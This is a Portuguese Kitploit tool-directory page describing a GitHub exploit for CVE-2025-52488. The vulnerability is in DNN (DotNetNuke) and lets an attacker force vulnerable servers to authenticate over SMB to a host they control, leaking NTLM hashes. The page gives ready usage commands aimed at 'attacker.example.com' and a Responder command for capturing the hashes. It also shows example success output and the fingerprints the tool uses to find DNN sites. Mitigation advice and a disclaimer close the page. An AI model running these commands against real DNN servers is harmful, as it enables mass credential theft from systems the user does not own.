Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-52488 — Este exploit tem como alvo uma vulnerabilidade no DNN (anteriormente DotNetNuke) nas versões 6.0.0 até antes de 10.0.1 que permite que atacantes revelem hashes NTLM por meio de ataques de normalização de caminho Unicode. | Kitploit
Ferramentas/GitHubGitHub/sh4den/cve-2025-52488
ReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de Informações
GitHubsh4den/cve-2025-52488

CVE-2025-52488

Este exploit tem como alvo uma vulnerabilidade no DNN (anteriormente DotNetNuke) nas versões 6.0.0 até antes de 10.0.1 que permite que atacantes revelem hashes NTLM por meio de ataques de normalização de caminho Unicode.

Ver Repositório
21há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de Divulgação de Hash NTLM por Normalização de Caminho Unicode do DNN (CVE-2025-52488)

Visão Geral

Este exploit visa uma vulnerabilidade nas versões 6.0.0 até antes de 10.0.1 do DNN (anteriormente DotNetNuke) que permite a atacantes divulgar hashes NTLM por meio de ataques de normalização de caminho Unicode.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-52488
  • Severidade: Alta (CVSS 8.6)
  • Versões Afetadas: 6.0.0 até antes de 10.0.1
  • Vetor de Ataque: Rede
  • Autenticação: Não necessária

Como Funciona

O exploit abusa de peculiaridades do Windows/.NET e da normalização Unicode para forçar o servidor DNN alvo a fazer requisições SMB a um servidor controlado pelo atacante, potencialmente expondo hashes NTLM durante o processo de autenticação.

Pré-requisitos

  1. Python 3.7+
  2. Pacotes necessários (instale com pip install -r requirements.txt)
  3. Servidor SMB para capturar hashes NTLM (ex.: Responder, Burp Collaborator)

Uso

Uso Básico

root@kitploit:~
python main.py targets.txt attacker.example.com

Com Parâmetros Personalizados

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Argumentos

  • targets: Arquivo contendo a lista de hosts DNN (um por linha)
  • smb_server: Hostname/IP do servidor SMB para capturar hashes NTLM
  • -t, --threads: Número de threads concorrentes (padrão: 10)
  • --timeout: Tempo limite de requisição em segundos (padrão: 10)

Formato do Arquivo de Alvos

Crie um arquivo de texto com as URLs dos alvos, uma por linha:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

Configurando o Servidor SMB

Você pode usar ferramentas como Responder para capturar hashes NTLM:

root@kitploit:~
responder -I eth0 -wrf

Ou use o Burp Collaborator para detecção fora de banda.

Exemplo de Saída

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Indicadores de Detecção

O exploit procura pelos seguintes indicadores do DNN:

  • cookie dnn_IsMobile
  • dotnetnuke na resposta
  • dnnconnect na resposta
  • DNN Platform na resposta

Mitigação

  • Atualize o DNN para a versão 10.0.1 ou posterior
  • Implemente controles em nível de rede para evitar requisições SMB a servidores externos
  • Monitore tentativas suspeitas de upload de arquivos

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e de teste de segurança autorizado. Use com responsabilidade e somente em sistemas que você possui ou sobre os quais tem permissão explícita para testar.

Referências

  • CVE-2025-52488
  • Assetnote Research
Baixar ferramenta